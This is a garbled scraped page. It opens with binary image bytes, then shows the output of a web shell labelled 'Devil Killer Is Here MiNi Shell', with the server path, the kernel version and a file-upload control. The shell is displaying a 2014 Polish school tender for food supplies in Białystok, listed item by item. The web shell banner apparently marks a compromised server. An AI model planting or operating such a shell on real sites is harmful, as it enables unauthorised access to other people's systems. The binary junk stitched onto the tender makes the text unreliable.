JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140604/120543-N-2014.html

<p class="kh_header"><b>Białystok: Dostawa artykułów żywieniowych w roku szkolnym 2014/2015 dla potrzeb Zespołu Szkół Integracyjnych Nr 1 im. Jana Pawła II w Białymstoku.</b><br>
<b>Numer ogłoszenia: 120543 - 2014; data zamieszczenia: 04.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Integracyjnych Nr 1 im. Jana Pawła II , ul. Łagodna 10, 15-757 Białystok, woj. podlaskie, tel. 085 6644680, faks 085 6540049.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsi1.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywieniowych w roku szkolnym 2014/2015 dla potrzeb Zespołu Szkół Integracyjnych Nr 1 im. Jana Pawła II w Białymstoku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiot zamówienia w zakresie zadania nr 1 dotyczy pieczywa i wyrobów cukierniczych:
1.Bułka tarta 500g - 500 kg
2.Bułka słodka z budyniem 60g - 2 000 szt.
3.Bułka słodka z marmoladą 60g - 2 000 szt.
4.Bułka słodka z serem 60g - 2 000 szt.
5.Bułka zwykła 50g - 3 000 szt.
6.Chleb baltonowski 600g - 3 000 szt.
7.Chleb baltonowski 500g - 2 500 szt.
8.Chleb z dynią 400g - 200 szt
9.Chleb razowy 500g - 400 szt.
10. Chleb wileński 500g - 200 szt.
11.Chleb wieloziarnisty 500g	200 szt.
12.Chleb z żurawiną 400g - 200 szt.
13.Pączek - 2 000 szt.

2)	Przedmiot zamówienia w zakresie zadania nr 2 dotyczy mięsa i wyrobów mięsnych:
1.Antrykot wołowy schłodzona w temperaturze od 00  do 20 C - 100 kg
2.Boczek pieczony b/k - 80 kg
3.Boczek świeży b/ż - mięso wieprzowe pochodzące z klas EUROP, barwa ciemnoróżowa, schłodzone w temperaturze od 00  do 40 C - 400 kg
4.Boczek wędzony - 100 kg
5.Filet z indyka- element uzyskany  z tuszki indyka mięśnie piersiowe pozbawione skóry, kości i ścięgien, bez przebarwień i uszkodzeń mechanicznych schłodzone w temperaturze od -10C do 20C	- 900 kg
6.Filet z kurczaka, piersi bez skóry- mięso uzyskane z tuszki kurcząt, mięśnie piersiowe, podwójne, pozbawione skóry, kości obojczyka, barwa i zapach charakterystyczny dla mięśni piersiowych, schłodzone w temperaturze od -10C 
do 20C - 1 000 kg
7.Gulasz wieprzowy - mięso z szynki pocięte w kawałki kwadratowe o wielkości od 2 do 3 cm pakowane w tacki próżniowe schłodzone w temperaturze od 00  do 40 C - 1500 kg
8.Karkowina b/k- mięso wieprzowe pochodzące z klas EUROP, odcięta z odcinka szyjnego, główne mięśnie szyi i część mięśnia najdłuższego grzbietu, zapach swoisty dla mięsa świeżego wieprzowego  schłodzone w temperaturze od 00  do 40 C - 1 000 kg
9.Kiełbasa biała parzona drobiowa zawierająca 80 procent drobiu nie krótsza niż 15 cm schłodzona w temperaturze od 00  do 40 C - 500 kg
10.Kiełbasa biała surowa zawierająca 91 procent mięsa wieprzowego z łopatki i szynki nie krótsza niż 15 cm schłodzona w temperaturze od 00  do 40 C - 500 kg
11.Kiełbasa biała wieprzowa parzona zawierająca 80 procent mięsa z łopatki i szynki nie krótsza niż 15 cm  schłodzone w temperaturze od 00  do 40 C	- 300 kg
12.Kiełbasa podwawelska zawierająca 94 procent mięsa wieprzowego schłodzone w temperaturze od 10  do 60 C	- 500 kg
13.Kiełbasa swojska zawierająca 90 procent mięsa wieprzowego, nie krótsza niż 15 cm schłodzone w temperaturze od 10  do 60 C - 500 kg
14.Kiełbasa toruńska zawierająca 80 procent mięsa wieprzowego schłodzone w temperaturze od 10  do 60 C	- 500 kg
15.Kiełbasa złota grillowa zawierająca 75 procent mięsa wieprzowego schłodzone w temperaturze od 10  do 60 C - 500 kg
16.Kości wieprzowe karkowe schłodzone w temperaturze od -10C do 20C - 200 kg
17.Kości wieprzowe schabowe schłodzone w temperaturze od -10C do 20C - 500 kg
18.Kurczak świeży cały  schłodzone w temperaturze od -10C do 20C - 800 kg
19.Krzyżówka świeża wieprzowa obrobiona schłodzone w temperaturze od -10C do 20C - 500 kg
20.Łopatka wieprzowa b/k- mięso wieprzowe pochodzące z klas EUROP, bez fałdu skóry, główne mięśnie: nadgrzbietowy, podgrzbietowy, podłopatkowy, trójgłowy ramienny, zespół mięśni ramiennych, zapach swoisty dla mięsa świeżego wieprzowego schłodzona w temperaturze od 00  do 40 C - 1 000 kg
21.Łopatka wołowa b/k schłodzona w temperaturze od 00  do 40 C - 400 kg
22.Mięsień czterogłowy- mięso wieprzowe pochodzące z klas EUROP, schłodzona w temperaturze od 00  do 40 C - 300 kg
23.Mięso kl II wieprzowe- mięso wieprzowe pochodzące z klas EUROP, schłodzona w temperaturze od 00  do 40 C - 1 000 kg
24.Mięso mielone- mięso wieprzowe pochodzące z klas EUROP, schłodzona w temperaturze od 00  do 40 C	- 1 000 kg
25.Mięso mielone wieprzowo- wołowe- schłodzone w temperaturze od 00  do 40 C - 400 kg
26.Parówki zawartość mięsa wieprzowego 80 procent	- 600 kg
27.Parówki zawartość mięsa wieprzowego 93 procent	- 500 kg
28.Podudzie z kurczaka ze stawem skokowym - 300 kg
29.Porcje rosołowe - 150 kg
30.Rozbratel wołowy schłodzona w temperaturze od 00  do 40 C	- 200 kg
31.Rostbef wołowy schłodzona w temperaturze od 00  do 40 C	- 200 kg
32.Rumsztyk wołowy schłodzona w temperaturze od 00  do 40 C	- 200 kg
33.Schab wieprzowy b/k- mięso wieprzowe pochodzące z klas EUROP odcinek piersiowo- lędźwiowy bez słoniny, mięsień najdłuższy grzbietu, wielodzielny, kolczysty i lędźwiowy większy, barwa jasno do ciemnoróżowej, zapach swoisty dla mięsa świeżego wieprzowego  schłodzona w temperaturze od 00  do 40 C - 1 000 kg
34.Szynka wieprzowa kl. I b/k (bitki)- mięso wieprzowe pochodzące z klas EUROP schłodzone w temperaturze od 00  do 40 C - 1 000 kg
35.Szynka wieprzowa kl. II b/k (gulasz)-  mięso wieprzowe pochodzące z klas EUROP schłodzone w temperaturze od 00  do 40 C - 500 kg
36.Szynka wieprzowa kl. III b/k (kotlet mielony)- mięso wieprzowe pochodzące z klas EUROP schłodzone w temperaturze od 00  do 40 C - 500 kg
37.Udziec wołowy b/k schłodzona w temperaturze od 00  do 40 C - 400 kg
38.Udziec z kurczaka świeży ze skórą i kością schłodzony w temperaturze od 00  do 40 C - 1 000 kg
39.Wątróbka drobiowa- podroby drobiowe schłodzony w temperaturze od 00  do 40 C - 200 kg
40.Wątroba wieprzowa- podroby z mięsa wieprzowego pochodzącego z klas EUROP, składa się z czterech płatów oddzielonych od siebie trzema głębokimi wcięciami, struktura nieznacznie ziarnista, powierzchnia głęboka, lekko błyszcząca i wilgotna, barwa brązowo- wiśniowa schłodzona w temperaturze od 00  do 30 C - 200 kg
41.Żeberka wp pasy- główne mięśnie międzyżebrowe wewnętrzne i zewnętrzne - 100 kg
42.Żołądki drobiowe- schłodzony w temperaturze od 00  do 40 C - 200 kg

3)	Przedmiot zamówienia w zakresie zadania nr 3 dotyczy mrożonek:
1.Fasolka szparagowa zielona nie mniejsza niż 450g - 200 szt.
2.Fasolka szparagowa żółta nie mniejsza niż 450g - 200 szt.
3.Filet z mintaja bez glazury - 200 kg
4.Filet z miruna bez glazury - 400 kg
5.Filet z morszczuka bez glazury - 400 kg
6.Filet z tilapii bez glazury - 500 kg
7.Filet z ryby zapiekany z serem - 200 kg
8.Frytka karbowana nie mniejsza niż 2,5 kg - 500 szt.
9.Kalafior nie mniejszy niż 450g - 200 szt.
10.Kartacze- zawartość nadzienia: mięso wieprzowe 14%, mięso wołowe 1,6%-700 kg
11.Knedle owocowe, mrożone (opak. 0,45 - 3kg) - składniki: woda, płatki ziemniaczane (16%), truskawki (16%), skrobia ziemniaczana (14%), mąka pszenna, cukier, skrobie modyfikowane, sól, jaja w proszku. - 400 kg
12.Kostka rybna panierowana składająca się z 90 procent ryby - 400 kg
13.Kotlet cordon bleu z indyka panierowany, smażony, mrożony 1 kg (wyrób garmażeryjny gotowy z mięsa rozdrobnionego z szynką z indyka i nadzieniem seropodobnym) skład kotleta: mięso z indyka 35%, panierka 16% ( mąka pszenna, skrobia pszenna, sól skrobia ziemniaczana, drożdże, przyprawy i ekstrakty przypraw), szynka z indyka 12% (mięso z indyka 61%, woda, sól, modyfikowana skrobia kukurydziana, sól, białko sojowe. - 400 kg
14.Lody kubek, różne smaki - 2 500 szt.
15.Leczo nie mniejsze niż 450 g - 300 szt.
16.Mieszanka kompotowa nie mniejsza niż 450 kg- skład: śliwka z pestką, wiśnia z pestką, porzeczka, jabłko, aronia, rabarbar w różnych proporcjach. - 400 szt.
17.Mieszanka warzywna 7-składnikowa 450g - 300 szt.
18.Mieszanka warzywna 8-składnikowa 450g - 300 szt.
19.Naleśnik  z serem 1 kg- farsz około 60%  - 400 kg
20.Paluszki rybne z fileta ryby	- 600 kg
21.Pierogi ruskie (opak. 0,5 - 2,5 kg) - 400 kg
22.Pierogi z kapustą i grzybami, mrożone-skład: mąka pszenna, kapusta kwaszona (19%), woda, kapusta biała (13%), pieczarki (3%), cebula, podgrzybek (1%), przyprawy, sól, olej roślinny, smalec wieprzowy, błonnik pszenny, suszone grzyby leśne (0,2%), cukier, skrobia modyfikowana, jaja w proszku, zawartość farszu 42% - 300 kg
23.Pierogi z truskawkami, mrożone- skład: Mąka pszenna, truskawki (31%), woda, cukier, skrobie modyfikowane, olej roślinny, jaja w proszku, sól, zawartość farszu 38% - 300 kg
24.Placki ziemniaczane zawierające 90% ziemniaka - 300 kg
25.Pyzy z mięsem-  skład: mąka pszenna, mięso wieprzowe (27%), woda, białko sojowe, cebula, mięso wołowe (2,8%), włoszczyzna (pietruszka, marchew, seler, por), błonnik pszenny, przyprawy, sól, olej roślinny, jaja w proszku, zawartość farszu 42%. - 200 kg
26.Pyzy ziemniaczane- skład: Woda, skrobia ziemniaczana (15%), płatki ziemniaczane (11%), grys ziemniaczany (10%), mąka pszenna, sól - 200 kg
27.Śledź solony typu matias - 100 kg
28.Śledź marynowany typu matias - 100 kg
29.Truskawka nie mniejsza niż 450g - 300 szt.
30.Wiśnia b/p nie mniejsza niż 450g - 400 szt.

4)	Przedmiot zamówienia w zakresie zadania nr 4 dotyczy artykułów spożywczych:
1.Baton typu Kinder bueno lub równoważny nie mniejszy niż 43g - 2 000 szt.
2.Baton typu Lion lub równoważny nie mniejszy niż 43g - 1 000 szt.
3.Baton typu Milky Way lub równoważny - 2 000 szt.
4.Baton typu Snickers lub równoważny nie mniejszy niż 51g - 2 000 szt.
5.Baton typu Nestle Cini Minis lub równoważny nie mniejszy niż 25g - 2 000 szt.
6.Bomboniera Toffifee lub równoważny nie mniejszy 125g - 800 szt.
7.Brzoskwinie w syropie nie mniejsze niż 850 ml - 100 szt.
8.Chrzan nie mniejszy niż 290g - 200 szt.
9.Ciastka typu Pieguski lub równoważne nie mniejsze niż 135 g - 1 500 szt.
10.Cukier nie mniejszy niż 1 kg - 2 500 kg
11.Cukier puder nie mniejszy niż 400g - 100 szt.
12.Cukier waniliowy nie mniejszy niż 32g - 100 szt.
13.Cynamon mielony nie mniejszy niż 15g - 50 szt.
14.Czekolada typu Alpen Gold lub równoważna nie mniejsza niż 100g - 2 000 szt.
15.Czekolada tylu goplana lub równoważna nie mniejsza niż 100g - 2 000 szt.
16.Czekolada typu Wedel lub równoważna nie mniejsza niż 100g - 2 000 szt.
17.Czekolada typu Baron lub równoważna nie mniejsza niż 100g - 2 000 szt.
18.Czosnek granulowany nie mniejszy niż 16g - 200 szt.
19.Delikat do drobiu typu Knorr lub równoważny nie mniejszy niż 600g - 50 szt.
20.Delikat do mięs typu Knorr lub równoważny nie mniejszy niż 700g- 50 szt.
21.Groszek konserwowy nie mniejszy niż 400g typu Vinegret lub równoważny - 350 szt.
22.Herbata typu Lipton lub równoważna saszetki 100x2g - 300 szt.
23.Herbata granulowana typu Lipton lub równoważna nie mniejsza niż 100 g - 100 szt.
24.Herbata liściasta typu Lipton lub równoważna nie mniejsza niż 100g - 100 szt.
25.Herbatniki typu Jeżyki lub równoważne nie mniejsze niż 140g - 3 000 szt.
26.Jajka typu Kinder lub równoważne nie mniejsze niż 20g - 2 500 szt.
27.Kasza gryczana nie mniejsza niż 500g - 200 szt.
28.Kasza jęczmienna gruboziarnista, średnia nie mniejsza niż 500g - 200 szt.
29.Kasza jęczmienna drobnoziarnista nie mniejsza niż 500g - 200szt.
30.Kasza jęczmienna pęczak nie mniejsza niż 500g - 500 szt.
31.Kasza manna nie mniejsza niż 500g - 60 szt.
32.Ketchup ł/p nie mniejszy niż 500g typu Pudliszki lub równoważny - 300 szt.
33.Koncentrat buraczany nie mniejszy niż 300ml typu Krakus lub równoważny - 20 l
34.Koncentrat pomidorowy nie mniejszy niż 1 kg typu Dawtona lub równoważny - 100 kg
35.Kukurydza konserwowa nie mniejsza niż 425g typu Vernet lub równoważny - 200 szt.
36.Kwasek cytrynowy nie mniejszy niż 20g - 400 szt.
37.Liść laurowy nie mniejszy niż 10g - 300 szt.
38.Liść laurowy nie mniejszy niż 12g - 200 szt.
39.Liść laurowy nie mniejszy niż 5g - 200 szt.
40.Lizak typu Chupa Chups lub równoważny - 2 000 szt.
41.Majeranek nie mniejszy niż 10g - 80 szt.
42.Majeranek nie mniejszy niż 20g - 300 szt.
43.Majonez nie mniejszy niż 320ml typu Winiary lub równoważny - 500 szt.
44.Majonez nie mniejszy niż 2,85 kg typu Winiary lub równoważny - 200 szt.
45.Majonez nie mniejszy niż 400 ml typu Winiary lub równoważny - 200 szt.
46.Makaron kolanka nie mniejszy niż 1 kg typu Barilla lub równoważny - 2 000 kg
47.Makaron spaghetti nie mniejszy niż 1 kg typu Lubella lub równoważny - 800 kg
48.Makaron świder nie mniejszy niż 1 kg typu Barilla lub równoważny - 400 kg
49.Mąka luksusowa nie mniejsza niż 1 kg - 400 kg
50.Mąka tortowa nie mniejsza niż 1 kg - 400 kg
51.Mąka ziemniaczana nie mniejsza niż 1 kg - 200 kg
52.Miód pasieka wielokwiatowy nie mniejszy niż 400g - 70 kg
53.Musztarda chrzanowa nie mniejsza niż 190g typu Agrovita lub równoważna - 400 szt.
54.Napój herbaciany nie mniejszy niż 300g - 100 szt.
55.Napój herbaciany cytrynowy nie mniejszy niż 300g - 100 szt.
56.Napój nie mniejszy niż 400 ml typu Kubuś play lub równoważny - 2 000 szt.
57.Ogórek konserwowy nie mniejszy niż 900 ml - 800 szt.
58.Olej nie mniejszy niż 1l typu Kujawski lub równoważny - 600 szt.
59.Ocet spirytusowy 10% nie mniejszy niż 500 ml - 50 szt.
60.Pieprz naturalny mielony nie mniejszy niż 20g typu Prymat lub równoważny - 580 szt.
61.Pieprz ziołowy mielony nie mniejszy niż 20g typu Prymat lub równoważny - 500 szt.
62.Pieprz ziołowy mielony nie mniejszy niż 15g typu Prymat lub równoważny - 400 szt.
63.Płatki owsiane nie mniejsze niż 500g - 100 szt.
64.Przecier ogórkowy nie mniejszy niż 300g - 300 szt.
65.Przyprawa do mięs i grilla nie mniejsza niż 1,1 kg typu maggi lub równoważna - 30 szt.
66.Przyprawa do mięsa mielonego nie mniejsza niż 20g - 200 szt.
67.Przyprawa do mięsa mielonego nie mniejsza niż 30g - 80 szt.
68.Przyprawa do ryb typu Prymat lub równoważna nie mniejsza niż 20g - 80 szt.
69.Przyprawa typu Jarzynka lub równoważna nie mniejsza niż 2,8 kg - 120 szt.
70.Przyprawa prowansalska nie mniejsza niż 10g - 300 szt.
71.Przyprawa sypka nie mniejsza niż 1 kg typu Vegetta lub równoważna - 500 kg
72.Przyprawa typu Vegeta lub równoważna 200g - 300 szt.
73.Przyprawa w płynie typu Winiary lub równoważna nie mniejsza 200g - 500 szt.
74.Przyprawa w płynie typu Winiary lub równoważna nie mniejsza niż 960 ml - 40 szt.
75.Pulpa pomidorowa nie mniejsza niż 3kg - 30 szt.
76.Rodzynki nie mniejsze niż 150g - 50 szt.
77.Rogalik typu Chipita 7 days lub równoważny nie mniejszy niż 65g - 4 000 szt.
78.Rosół drobiowy typu Winiary lub równoważny nie mniejszy niż 2,2 kg - 30 kg
79.Ryż biały typu Sonko lub równoważny nie mniejszy niż 1 kg - 500 kg
80.Sekret szefa drobiowy typu Maggi lub równoważny nie mniejszy niż 800 g - 20 kg
81.Sekret szefa grzybowy typu Maggi lub równoważny nie mniejszy niż 650g - 15 kg
82.Sekret szefa typu Maggi lub równoważny wołowy nie mniejszy niż 900g - 25 kg
83.Sos boloński typu Winiary lub równoważny nie mniejszy niż 1 kg - 30 kg
84.Sos boloński typu Winiary lub równoważny nie mniejszy niż 1,1 kg - 30 kg
85.Sos demi glace typu Winiary lub równoważny nie mniejszy niż 900 g - 30 kg
86.Sos grzyby leśne typu Winiary lub równoważny nie mniejszy niż 900g - 30 kg
87.Sos myśliwski typu Winiary lub równoważny nie mniejszy niż 900 g - 30 kg
88.Sos pieczeniowy typu Winiary lub równoważny nie mniejszy niż 1,1 kg - 35 kg
89.Sos sałatkowy typu Winiary lub równoważny nie mniejszy niż 900 g - 30 kg
90.Sos spaghetti typu Łowicz lub równoważny nie mniejszy niż 350 ml - 140 l
91.Sos spaghetti typu Łowicz lub równoważny nie mniejszy niż 520 ml - 120 l
92.Sól jodowana typu Cenos lub równoważna nie mniejsza niż 1 kg - 700 kg
93.Syrop mix typu Herbapol lub równoważny nie mniejszy niż 420 ml - 1 000 szt.
94.Syrop mix typu Paola lub równoważny nie mniejszy niż 430 ml - 1 000 szt.
95.Szczaw konserwowy typu Hana lub równoważny nie mniejszy niż 300g - 400 szt.
96.Szczaw konserwowy typu Hana lub równoważny nie mniejszy niż 900g - 100 szt.
97.Wafel typu Pronce Polo XXL lub równoważny 52g - 1 000 szt.
98.Zając wielkanocny 30g - 800 szt.
99.Ziele angielskie nie mniejsze niż 15 g - 900 szt.
100.Zupa barszcz biały typu Winiary lub równoważna nie mniejsza niż 900 g - 70 szt.
101.Zupa borowikowa typu Winiary lub równoważna nie mniejsza niż 900g - 40 szt.
102.Zupa cebulowa typu Winiary lub równoważna nie mniejsza 900g - 30 szt.
103.Zupa ogonowa typu Winiary lub równoważna nie mniejsza niż 900g - 80 szt.
104.Zupa żurek typu Winiary lub równoważna nie mniejsza niż 900g - 30 szt.
105.Zestaw świąteczny 145g - 1 000 szt.

5)	Przedmiot zamówienia w zakresie zadania nr 5 dotyczy nabiału:
1.Drożdże świeże nie mniejsze niż 100g - 200 szt.
2.Jogurt polski pitny różne smaki nie mniejszy niż 400g - 1 000 szt.
3.Jogurt polski pitny różne smaki nie mniejszy niż 250g - 1 000 szt.
4.Masło śmietankowe nie mniejsze niż 200g zawartość tłuszczu 73% - 500 szt.
5.Masło ekstra nie mniejsze niż 200g zawartość tłuszczu 82% - 500 szt.
6.Masło typu Łaciate nie mniejsze niż 200g zawartość tłuszczu 83% - 500 szt.
7.Mleko 3/2% UHT w kartonie, nie mniejsze niż 1l - 500 szt.
8.Mleko UHT typu Twój kubek 2% w kartonie, nie mniejsze niż 1l - 200 szt.
9.Ser żółty typu Gouda lub równoważny - 250 kg
10.Śmietana nie mniejsza niż 0,2 l- 500 szt.
11.Śmietana gęsta 18% nie mniejsza niż 400 ml - 3000 szt.
12.Twaróg mielony w wiadrze nie mniejszy niż 1 kg -100 kg
13.Twaróg półtłusty krajanka - 500 kg

6)	Przedmiot zamówienia w zakresie zadania nr 6 dotyczy warzyw i owoców:
1.Banan - 2 000 kg
2.Brzoskwinia - 2 000 kg
3.Burak - 2 000 kg
4.Cebula - 1 000 kg
5.Cytryna - 200 kg
6.Czereśnia - 500 kg
7.Czosnek świeży - 5 kg
8.Fasola drobna - 500 kg
9.Groch połówki - 500 kg
10.Gruszka - 1 800 kg
11.Jabłko - 1 900 kg
12.Jaja - 900 kg
13.Kalafior - 200 kg
14.Kapusta biała - 1 500 kg
15.Kapusta biała młoda - 400 kg
16.Kapusta czerwona - 1 000 kg
17.Kapusta kiszona - 1 000 kg
18.Kapusta pekińska - 500 kg
19.Kapusta włoska - 800 kg
20.Kiwi - 1 800 kg
21.Koper - 500 pęczków
22.Mandarynka - 1 500 kg
23.Marchew - 5 000 kg
24.Nektarynka - 1 200 kg
25.Ogórek gruntowy - 400 kg
26.Ogórek kiszony - 600 kg
27.Ogórek małosolny - 800 kg
28.Ogórek świeży - 1 000 kg
29.Papryka - 400 kg
30.Pieczarka - 900 kg
31.Pietruszka - 1 500 kg
32.Pietruszka natka - 500 pęczków
33.Pomarańcza - 2 000 kg
34.Pomidor - 1 000 kg
35.Pomidor malinowy - 500 kg
36.Por - 700 kg
37.Rzodkiew biała sopel - 400 kg
38.Rabarbar świeży - 300 kg
39.Rzodkiewka - 800 pęczków
40.Sałata - 400 kg
41.Seler - 1 000 kg
42.Szczypior - 300 pęczków
43.Śliwka - 500 kg
44.Truskawka - 300 kg
45.Winogrono jasne - 600 kg
46.Winogrono ciemne - 600 kg
47.Wiśnia - 500 kg
48.Ziemniak - 28 000 kg
49.Ziemniaki młode - 4 000 kg.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz dostaw wykonanych w okresie 2 lat.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li></ul>
